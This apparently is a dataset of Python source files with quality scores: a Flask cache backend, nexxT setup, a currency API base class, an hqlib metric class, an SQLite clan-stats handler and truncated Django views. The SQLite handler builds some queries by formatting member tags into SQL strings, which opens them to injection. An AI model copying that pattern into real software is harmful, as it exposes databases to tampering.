FileSystemCache(*args, **kwargs) # RedisCache is supported since Werkzeug 0.7. try: from werkzeug.contrib.cache import RedisCache except ImportError: pass else: def redis(app, config, args, kwargs): kwargs.update(dict( host=config.get('CACHE_REDIS_HOST', 'localhost'), port=config.get('CACHE_REDIS_PORT', 6379), )) password = config.get('CACHE_REDIS_PASSWORD') if password: kwargs['password'] = password key_prefix = config.get('CACHE_KEY_PREFIX') if key_prefix: kwargs['key_prefix'] = key_prefix return RedisCache(*args, **kwargs)
0.464173
0.047338
def setup(): try: from importlib import metadata except ImportError: # Running on pre-3.8 Python; use importlib-metadata package import importlib_metadata as metadata import logging from pathlib import Path import os import sys import platform logger = logging.getLogger() INTERNAL = 5 # setup log level for internal messages logging.addLevelName(INTERNAL, "INTERNAL") logging.INTERNAL = INTERNAL def internal(self, message, *args, **kws): if self.isEnabledFor(INTERNAL): # Yes, logger takes its '*args' as 'args'. self._log(INTERNAL, message, args, **kws) logging.Logger.internal = internal console = logging.StreamHandler() console.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(message)s")) logger.addHandler(console) logger.info("configured logger") logger.setLevel(logging.INFO) global __version__ __version__ = metadata.version("nexxT") global useCImpl useCImpl = not bool(int(os.environ.get("NEXXT_DISABLE_CIMPL", "0"))) if useCImpl: # make sure to import PySide2 before loading the cnexxT extension module because # there is a link-time dependency which would be impossible to resolve otherwise import PySide2.QtCore p = os.environ.get("NEXXT_CEXT_PATH", None) if p is None: variant = os.environ.get("NEXXT_VARIANT", "release") cplatform = "linux_x86_64" if platform.system() == "Linux" else "msvc_x86_64" p = [p for p in [Path(__file__).parent / "binary" / cplatform / variant, Path(__file__).parent / "binary" / cplatform / variant] if p.exists()] if len(p) > 0: p = p[0].absolute() else: p = None if p is not None: p = str(Path(p).absolute()) logger.info("c extension module search path: %s", p) sys.path.append(p) import cnexxT as imp_cnexxT global cnexxT cnexxT = imp_cnexxT def setLevel(level): ret = setLevel.origFunc(level) cnexxT.nexxT.Logging.setLogLevel(logger.level) return ret setLevel.origFunc = logger.setLevel logger.setLevel = setLevel logger.setLevel(logging.INFO) setup()
nexxT/__init__.py
def setup(): try: from importlib import metadata except ImportError: # Running on pre-3.8 Python; use importlib-metadata package import importlib_metadata as metadata import logging from pathlib import Path import os import sys import platform logger = logging.getLogger() INTERNAL = 5 # setup log level for internal messages logging.addLevelName(INTERNAL, "INTERNAL") logging.INTERNAL = INTERNAL def internal(self, message, *args, **kws): if self.isEnabledFor(INTERNAL): # Yes, logger takes its '*args' as 'args'. self._log(INTERNAL, message, args, **kws) logging.Logger.internal = internal console = logging.StreamHandler() console.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(message)s")) logger.addHandler(console) logger.info("configured logger") logger.setLevel(logging.INFO) global __version__ __version__ = metadata.version("nexxT") global useCImpl useCImpl = not bool(int(os.environ.get("NEXXT_DISABLE_CIMPL", "0"))) if useCImpl: # make sure to import PySide2 before loading the cnexxT extension module because # there is a link-time dependency which would be impossible to resolve otherwise import PySide2.QtCore p = os.environ.get("NEXXT_CEXT_PATH", None) if p is None: variant = os.environ.get("NEXXT_VARIANT", "release") cplatform = "linux_x86_64" if platform.system() == "Linux" else "msvc_x86_64" p = [p for p in [Path(__file__).parent / "binary" / cplatform / variant, Path(__file__).parent / "binary" / cplatform / variant] if p.exists()] if len(p) > 0: p = p[0].absolute() else: p = None if p is not None: p = str(Path(p).absolute()) logger.info("c extension module search path: %s", p) sys.path.append(p) import cnexxT as imp_cnexxT global cnexxT cnexxT = imp_cnexxT def setLevel(level): ret = setLevel.origFunc(level) cnexxT.nexxT.Logging.setLogLevel(logger.level) return ret setLevel.origFunc = logger.setLevel logger.setLevel = setLevel logger.setLevel(logging.INFO) setup()
0.232746
0.127381
from abc import ABC, abstractmethod from datetime import datetime from functools import wraps import re from typing import Any, Callable, Dict, Iterable, TypeVar from urllib.parse import urljoin, urlparse, urlunparse, urlencode from urllib.request import Request from calculate_anything.currency.data import CurrencyData from calculate_anything.exceptions import CurrencyProviderException __all__ = ['ApiKeyCurrencyProvider', 'FreeCurrencyProvider'] RT = TypeVar('RT') class CurrencyProvider(ABC): BASE_URL: str API_URL: str class Decorators: @staticmethod def with_ratelimit(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'CurrencyProvider', *currencies: Iterable[str], force: bool = False ) -> Any: timestamp = datetime.now().timestamp() if ( not force and self.had_error and timestamp - 60 <= self.last_request_timestamp ): raise CurrencyProviderException('Too many requests') self.last_request_timestamp = timestamp return func(self, *currencies, force=force) return _wrapper def __init__(self) -> None: self.last_request_timestamp = 0 self.had_error = False @classmethod def get_request(cls, params: Dict[str, str] = {}) -> Request: headers = {'user-agent': 'Calculate Anything'} url = urljoin(cls.BASE_URL, cls.API_URL) url = list(urlparse(url)) url[4] = urlencode(params) url = urlunparse(url) request = Request(url, headers=headers) # Only urls and only secure connections # Don't fucking install untrusted certs unless you want # a mitm xml bomb on your head # and no I won't install extra dependencies for your stupidity if not re.match(r'^https:\/\/', request.full_url): raise Exception('Invalid request url: {}'.format(request.full_url)) return request @abstractmethod def request_currencies( self, *currencies: str, force: bool = False ) -> CurrencyData: pass class _MockCurrencyProvider(CurrencyProvider): def __init__(self, *args, **kwargs): pass def request_currencies( self, *currencies: str, force: bool ) -> CurrencyData: pass class FreeCurrencyProvider(CurrencyProvider): pass class ApiKeyCurrencyProvider(CurrencyProvider): class Decorators(CurrencyProvider.Decorators): @staticmethod def with_valid_api_key(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'ApiKeyCurrencyProvider', *args: Any, **kwargs: Any ): if not self.api_key_valid: self.had_error = True raise CurrencyProviderException('API Key is not valid') return func(self, *args, **kwargs) return _wrapper def __init__(self, api_key: str = '') -> None: super().__init__() self._api_key = api_key @property def api_key_valid(self) -> bool: return isinstance(self._api_key, str) and self._api_key.strip() != '' @property def api_key(self) -> str: return self._api_key @api_key.setter def api_key(self, api_key: str) -> None: self._api_key = api_key
calculate_anything/currency/providers/base.py
from abc import ABC, abstractmethod from datetime import datetime from functools import wraps import re from typing import Any, Callable, Dict, Iterable, TypeVar from urllib.parse import urljoin, urlparse, urlunparse, urlencode from urllib.request import Request from calculate_anything.currency.data import CurrencyData from calculate_anything.exceptions import CurrencyProviderException __all__ = ['ApiKeyCurrencyProvider', 'FreeCurrencyProvider'] RT = TypeVar('RT') class CurrencyProvider(ABC): BASE_URL: str API_URL: str class Decorators: @staticmethod def with_ratelimit(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'CurrencyProvider', *currencies: Iterable[str], force: bool = False ) -> Any: timestamp = datetime.now().timestamp() if ( not force and self.had_error and timestamp - 60 <= self.last_request_timestamp ): raise CurrencyProviderException('Too many requests') self.last_request_timestamp = timestamp return func(self, *currencies, force=force) return _wrapper def __init__(self) -> None: self.last_request_timestamp = 0 self.had_error = False @classmethod def get_request(cls, params: Dict[str, str] = {}) -> Request: headers = {'user-agent': 'Calculate Anything'} url = urljoin(cls.BASE_URL, cls.API_URL) url = list(urlparse(url)) url[4] = urlencode(params) url = urlunparse(url) request = Request(url, headers=headers) # Only urls and only secure connections # Don't fucking install untrusted certs unless you want # a mitm xml bomb on your head # and no I won't install extra dependencies for your stupidity if not re.match(r'^https:\/\/', request.full_url): raise Exception('Invalid request url: {}'.format(request.full_url)) return request @abstractmethod def request_currencies( self, *currencies: str, force: bool = False ) -> CurrencyData: pass class _MockCurrencyProvider(CurrencyProvider): def __init__(self, *args, **kwargs): pass def request_currencies( self, *currencies: str, force: bool ) -> CurrencyData: pass class FreeCurrencyProvider(CurrencyProvider): pass class ApiKeyCurrencyProvider(CurrencyProvider): class Decorators(CurrencyProvider.Decorators): @staticmethod def with_valid_api_key(func: Callable[..., RT]) -> RT: @wraps(func) def _wrapper( self: 'ApiKeyCurrencyProvider', *args: Any, **kwargs: Any ): if not self.api_key_valid: self.had_error = True raise CurrencyProviderException('API Key is not valid') return func(self, *args, **kwargs) return _wrapper def __init__(self, api_key: str = '') -> None: super().__init__() self._api_key = api_key @property def api_key_valid(self) -> bool: return isinstance(self._api_key, str) and self._api_key.strip() != '' @property def api_key(self) -> str: return self._api_key @api_key.setter def api_key(self, api_key: str) -> None: self._api_key = api_key
0.755005
0.14436
from typing import Any, Dict, List, Set, Type, Optional, TYPE_CHECKING from hqlib.typing import MetricValue from ..base import DomainObject if TYPE_CHECKING: # pragma: no cover # pylint: disable=unused-import from .metric import Metric from .metric_source import MetricSource class MeasurableObject(DomainObject): """ An object that has measurable characteristics. Base class for products, teams, etc. """ def __init__(self, *args, **kwargs) -> None: self.__metric_sources: Dict = kwargs.pop('metric_sources', dict()) self.__metric_source_ids: Dict['MetricSource', str] = kwargs.pop('metric_source_ids', dict()) self.__metric_options: Dict[Type['Metric'], Dict[str, Any]] = kwargs.pop('metric_options', dict()) super().__init__(*args, **kwargs) def target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('target') def low_target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the low target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('low_target') def technical_debt_target(self, metric_class: Type['Metric']): """ Return whether a score below target is considered to be accepted technical debt. """ return self.__metric_options.get(metric_class, dict()).get('debt_target') def metric_sources(self, metric_source_class: Type['MetricSource']) -> List['MetricSource']: """ Return the metric source instances for the metric source class. """ metric_sources = self.__metric_sources.get(metric_source_class, []) if metric_sources and not isinstance(metric_sources, list): metric_sources = [metric_sources] return metric_sources def metric_source_classes(self) -> List[Type['MetricSource']]: """ Return a set of all metric source classes. """ return list(self.__metric_sources.keys()) def metric_source_id(self, metric_source: 'MetricSource') -> Optional[str]: """ Return the id of this object in the metric source. """ return self.__metric_source_ids.get(metric_source) def metric_options(self, metric_class: Type['Metric']) -> Dict[str, Any]: """ Return the options of this object for the metric class. Options can be any information that is needed for the metric. """ return self.__metric_options.get(metric_class, dict()) def metrics_with_options(self) -> Set[Type['Metric']]: """ Return the metrics that have options. """ return set(self.__metric_options.keys())
backend/hqlib/domain/measurement/measurable.py
from typing import Any, Dict, List, Set, Type, Optional, TYPE_CHECKING from hqlib.typing import MetricValue from ..base import DomainObject if TYPE_CHECKING: # pragma: no cover # pylint: disable=unused-import from .metric import Metric from .metric_source import MetricSource class MeasurableObject(DomainObject): """ An object that has measurable characteristics. Base class for products, teams, etc. """ def __init__(self, *args, **kwargs) -> None: self.__metric_sources: Dict = kwargs.pop('metric_sources', dict()) self.__metric_source_ids: Dict['MetricSource', str] = kwargs.pop('metric_source_ids', dict()) self.__metric_options: Dict[Type['Metric'], Dict[str, Any]] = kwargs.pop('metric_options', dict()) super().__init__(*args, **kwargs) def target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('target') def low_target(self, metric_class: Type['Metric']) -> MetricValue: """ Return the low target for the specified metric. """ return self.__metric_options.get(metric_class, dict()).get('low_target') def technical_debt_target(self, metric_class: Type['Metric']): """ Return whether a score below target is considered to be accepted technical debt. """ return self.__metric_options.get(metric_class, dict()).get('debt_target') def metric_sources(self, metric_source_class: Type['MetricSource']) -> List['MetricSource']: """ Return the metric source instances for the metric source class. """ metric_sources = self.__metric_sources.get(metric_source_class, []) if metric_sources and not isinstance(metric_sources, list): metric_sources = [metric_sources] return metric_sources def metric_source_classes(self) -> List[Type['MetricSource']]: """ Return a set of all metric source classes. """ return list(self.__metric_sources.keys()) def metric_source_id(self, metric_source: 'MetricSource') -> Optional[str]: """ Return the id of this object in the metric source. """ return self.__metric_source_ids.get(metric_source) def metric_options(self, metric_class: Type['Metric']) -> Dict[str, Any]: """ Return the options of this object for the metric class. Options can be any information that is needed for the metric. """ return self.__metric_options.get(metric_class, dict()) def metrics_with_options(self) -> Set[Type['Metric']]: """ Return the metrics that have options. """ return set(self.__metric_options.keys())
0.914721
0.201853
import sqlite3 class dbHandler: DB_TABLE_MEMBER = 'members' DB_MEMBER_ID = 'id' DB_MEMBER_TAG = 'tag' DB_MEMBER_NAME = 'name' DB_MEMBER_KEY_STATUS = 'keyStatus' DB_TABLE_BATTLES = 'battles' DB_BATTLES_ID = 'id' DB_BATTLES_KEY_MEMBERID = 'memberId' DB_BATTLES_KEY_MATCH = 'keyMatch' DB_BATTLES_KEY_RESULT = 'keyResult' DB_BATTLES_UTC = 'utcTime' DB_TABLE_CW = 'clanWars' DB_CW_ID = 'id' DB_CW_UTC_START = 'utcStart' DB_CW_UTC_END = 'utcEnd' DB_TABLE_KEY_MATCH = 'keyMatch' DB_MATCH_ID = 'id' DB_MATCH_NAME = 'name' DB_VALUE_MATCH_COLLECTION_DAY = [0, 'Collection Day'] DB_VALUE_MATCH_WAR_DAY = [1, 'War Day'] DB_TABLE_KEY_RESULT = 'keyResult' DB_RESULT_ID = 'id' DB_RESULT_NAME = 'name' DB_VALUE_RESULT_WIN = [0, 'Win'] DB_VALUE_RESULT_DRAW = [1, 'Draw'] DB_VALUE_RESULT_LOSE = [2, 'Lose'] DB_TABLE_KEY_STATUS = 'keyStatus' DB_STATUS_ID = 'id' DB_STATUS_NAME = 'name' DB_VALUE_STATUS_ACTIVE = [0, 'Active'] DB_VALUE_STATUS_INACTIVE = [1, 'Inactive'] def createTableIfNotExist(self): if self.conn.cursor().execute("SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'").fetchone()[0] == 0: c = self.conn.cursor() c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} TEXT, {3} TEXT, {4} INTEGER)'.format(self.DB_TABLE_MEMBER, self.DB_MEMBER_ID, self.DB_MEMBER_TAG, self.DB_MEMBER_NAME, self.DB_MEMBER_KEY_STATUS)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER, {4} INTEGER, {5} INTEGER, UNIQUE({2}, {5}))'.format(self.DB_TABLE_BATTLES, self.DB_BATTLES_ID, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER)'.format(self.DB_TABLE_CW, self.DB_CW_ID, self.DB_CW_UTC_START, self.DB_CW_UTC_END)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME)) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_COLLECTION_DAY[0], self.DB_VALUE_MATCH_COLLECTION_DAY[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_WAR_DAY[0], self.DB_VALUE_MATCH_WAR_DAY[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_WIN[0], self.DB_VALUE_RESULT_WIN[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_DRAW[0], self.DB_VALUE_RESULT_DRAW[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_LOSE[0], self.DB_VALUE_RESULT_LOSE[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_ACTIVE[0], self.DB_VALUE_STATUS_ACTIVE[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_INACTIVE[0], self.DB_VALUE_STATUS_INACTIVE[1])) self.conn.commit() return True def dbOpen(self): self.conn = sqlite3.connect(self.dbPath) def dbClose(self): self.conn.close() def createMember(self, tag, name, status=DB_VALUE_STATUS_ACTIVE[0]): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}) VALUES (?, ?, ?)".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_NAME, self.DB_MEMBER_TAG, self.DB_MEMBER_KEY_STATUS), (name, tag, status)) self.conn.commit() return True def updaterMemberStatus(self, tag, status): c = self.conn.cursor() c.execute("UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, status, self.DB_MEMBER_TAG, tag)) self.conn.commit() def readMember_Tag(self, tag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (tag,)) for row in c: return row def createBattle(self, memberId, match, result, utcTime): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}, {4}) VALUES (?, ?, ?, ?)".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC), (memberId, match, result, utcTime)) self.conn.commit() return True def readBattle(self, memberId, utcTime): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=? AND {2}=?".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_UTC), (memberId, utcTime)) for row in c: return row def getMemberIdFromTag(self, memberTag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (memberTag,)) for row in c: return row[0] if not row == None else None def updaterOtherMemberInactive(self, active_Tag): activeTag_string = '' for tag in active_Tag: activeTag_string = activeTag_string + ",'{0}'".format(tag) activeTag_string = activeTag_string[1:] c = self.conn.cursor() c.execute("SELECT {0} FROM {1} WHERE {2} not IN ({3})".format(self.DB_MEMBER_TAG, self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG, activeTag_string)) for tag in c: self.updaterMemberStatus(tag[0], self.DB_VALUE_STATUS_INACTIVE[0]) def updateMemberList(self, memberList): active_Tag = [] for member in memberList: active_Tag.append(member[self.DB_MEMBER_TAG]) if self.readMember_Tag(member[self.DB_MEMBER_TAG]) == None: self.createMember(member[self.DB_MEMBER_TAG], member[self.DB_MEMBER_NAME]) self.updaterOtherMemberInactive(active_Tag) return True def updateMemberBattleLog(self, memberTag, matchType, result, utcTime): memberId = self.getMemberIdFromTag(memberTag) if not memberId == None and self.readBattle(memberId, utcTime) == None: self.createBattle(memberId, matchType, result, utcTime) return True def getActiveClanMemberTag(self): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) tag = [] tag_string = '' for row in c: tag.append(row[0]) tag_string = tag_string + ',' + str(row[1]) return tag_string[1:] def getActiveMemberNumber(self): c = self.conn.cursor() c.execute("SELECT count(*) as count, * from {0} where {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) for row in c: return row[0] def __init__(self, dbPath): self.dbPath = dbPath self.dbOpen() self.createTableIfNotExist()
ClanWarStatsModule/dbHandler.py
import sqlite3 class dbHandler: DB_TABLE_MEMBER = 'members' DB_MEMBER_ID = 'id' DB_MEMBER_TAG = 'tag' DB_MEMBER_NAME = 'name' DB_MEMBER_KEY_STATUS = 'keyStatus' DB_TABLE_BATTLES = 'battles' DB_BATTLES_ID = 'id' DB_BATTLES_KEY_MEMBERID = 'memberId' DB_BATTLES_KEY_MATCH = 'keyMatch' DB_BATTLES_KEY_RESULT = 'keyResult' DB_BATTLES_UTC = 'utcTime' DB_TABLE_CW = 'clanWars' DB_CW_ID = 'id' DB_CW_UTC_START = 'utcStart' DB_CW_UTC_END = 'utcEnd' DB_TABLE_KEY_MATCH = 'keyMatch' DB_MATCH_ID = 'id' DB_MATCH_NAME = 'name' DB_VALUE_MATCH_COLLECTION_DAY = [0, 'Collection Day'] DB_VALUE_MATCH_WAR_DAY = [1, 'War Day'] DB_TABLE_KEY_RESULT = 'keyResult' DB_RESULT_ID = 'id' DB_RESULT_NAME = 'name' DB_VALUE_RESULT_WIN = [0, 'Win'] DB_VALUE_RESULT_DRAW = [1, 'Draw'] DB_VALUE_RESULT_LOSE = [2, 'Lose'] DB_TABLE_KEY_STATUS = 'keyStatus' DB_STATUS_ID = 'id' DB_STATUS_NAME = 'name' DB_VALUE_STATUS_ACTIVE = [0, 'Active'] DB_VALUE_STATUS_INACTIVE = [1, 'Inactive'] def createTableIfNotExist(self): if self.conn.cursor().execute("SELECT COUNT(*) FROM sqlite_master WHERE type = 'table'").fetchone()[0] == 0: c = self.conn.cursor() c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} TEXT, {3} TEXT, {4} INTEGER)'.format(self.DB_TABLE_MEMBER, self.DB_MEMBER_ID, self.DB_MEMBER_TAG, self.DB_MEMBER_NAME, self.DB_MEMBER_KEY_STATUS)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER, {4} INTEGER, {5} INTEGER, UNIQUE({2}, {5}))'.format(self.DB_TABLE_BATTLES, self.DB_BATTLES_ID, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY AUTOINCREMENT, {2} INTEGER, {3} INTEGER)'.format(self.DB_TABLE_CW, self.DB_CW_ID, self.DB_CW_UTC_START, self.DB_CW_UTC_END)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME)) c.execute('CREATE table {0} ({1} INTEGER PRIMARY KEY, {2} TEXT)'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME)) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_COLLECTION_DAY[0], self.DB_VALUE_MATCH_COLLECTION_DAY[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_MATCH, self.DB_MATCH_ID, self.DB_MATCH_NAME, self.DB_VALUE_MATCH_WAR_DAY[0], self.DB_VALUE_MATCH_WAR_DAY[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_WIN[0], self.DB_VALUE_RESULT_WIN[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_DRAW[0], self.DB_VALUE_RESULT_DRAW[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_RESULT, self.DB_RESULT_ID, self.DB_RESULT_NAME, self.DB_VALUE_RESULT_LOSE[0], self.DB_VALUE_RESULT_LOSE[1])) self.conn.commit() c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_ACTIVE[0], self.DB_VALUE_STATUS_ACTIVE[1])) c.execute('INSERT INTO {0} ({1}, {2}) VALUES ("{3}", "{4}")'.format(self.DB_TABLE_KEY_STATUS, self.DB_STATUS_ID, self.DB_STATUS_NAME, self.DB_VALUE_STATUS_INACTIVE[0], self.DB_VALUE_STATUS_INACTIVE[1])) self.conn.commit() return True def dbOpen(self): self.conn = sqlite3.connect(self.dbPath) def dbClose(self): self.conn.close() def createMember(self, tag, name, status=DB_VALUE_STATUS_ACTIVE[0]): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}) VALUES (?, ?, ?)".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_NAME, self.DB_MEMBER_TAG, self.DB_MEMBER_KEY_STATUS), (name, tag, status)) self.conn.commit() return True def updaterMemberStatus(self, tag, status): c = self.conn.cursor() c.execute("UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, status, self.DB_MEMBER_TAG, tag)) self.conn.commit() def readMember_Tag(self, tag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (tag,)) for row in c: return row def createBattle(self, memberId, match, result, utcTime): c = self.conn.cursor() c.execute("INSERT INTO {0} ({1}, {2}, {3}, {4}) VALUES (?, ?, ?, ?)".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_KEY_MATCH, self.DB_BATTLES_KEY_RESULT, self.DB_BATTLES_UTC), (memberId, match, result, utcTime)) self.conn.commit() return True def readBattle(self, memberId, utcTime): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=? AND {2}=?".format(self.DB_TABLE_BATTLES, self.DB_BATTLES_KEY_MEMBERID, self.DB_BATTLES_UTC), (memberId, utcTime)) for row in c: return row def getMemberIdFromTag(self, memberTag): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}=?".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG), (memberTag,)) for row in c: return row[0] if not row == None else None def updaterOtherMemberInactive(self, active_Tag): activeTag_string = '' for tag in active_Tag: activeTag_string = activeTag_string + ",'{0}'".format(tag) activeTag_string = activeTag_string[1:] c = self.conn.cursor() c.execute("SELECT {0} FROM {1} WHERE {2} not IN ({3})".format(self.DB_MEMBER_TAG, self.DB_TABLE_MEMBER, self.DB_MEMBER_TAG, activeTag_string)) for tag in c: self.updaterMemberStatus(tag[0], self.DB_VALUE_STATUS_INACTIVE[0]) def updateMemberList(self, memberList): active_Tag = [] for member in memberList: active_Tag.append(member[self.DB_MEMBER_TAG]) if self.readMember_Tag(member[self.DB_MEMBER_TAG]) == None: self.createMember(member[self.DB_MEMBER_TAG], member[self.DB_MEMBER_NAME]) self.updaterOtherMemberInactive(active_Tag) return True def updateMemberBattleLog(self, memberTag, matchType, result, utcTime): memberId = self.getMemberIdFromTag(memberTag) if not memberId == None and self.readBattle(memberId, utcTime) == None: self.createBattle(memberId, matchType, result, utcTime) return True def getActiveClanMemberTag(self): c = self.conn.cursor() c.execute("SELECT * FROM {0} WHERE {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) tag = [] tag_string = '' for row in c: tag.append(row[0]) tag_string = tag_string + ',' + str(row[1]) return tag_string[1:] def getActiveMemberNumber(self): c = self.conn.cursor() c.execute("SELECT count(*) as count, * from {0} where {1}='{2}'".format(self.DB_TABLE_MEMBER, self.DB_MEMBER_KEY_STATUS, self.DB_VALUE_STATUS_ACTIVE[0])) for row in c: return row[0] def __init__(self, dbPath): self.dbPath = dbPath self.dbOpen() self.createTableIfNotExist()
0.285272
0.050401
from django.shortcuts import render from django.http import HttpResponseRedirect from .models import registration from django.http import HttpResponse from django.shortcuts import redirect import requests # base url database url_root = 'https://search-build.herokuapp.com' def delete(request): """ User delete function. is available to the user only with the correct data cookie value Args: request : request, cleaned stores the information about the session """ if 'session_id' in request.COOKIES: if request.method =="POST": url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.delete(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : response = redirect("/") response.delete_cookie("session_id") return response else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: return render(request, "users/delete.html") else: return redirect("/users/login/") def login(request): """ User login function. sends a password and email to the database for comparison, receives a cookie in return "session_id" Args: request : request, cleaned stores the information about the session Returns: render "users/logout.html" if the user is already with cookies render "users/login.html" if the user is without cookies 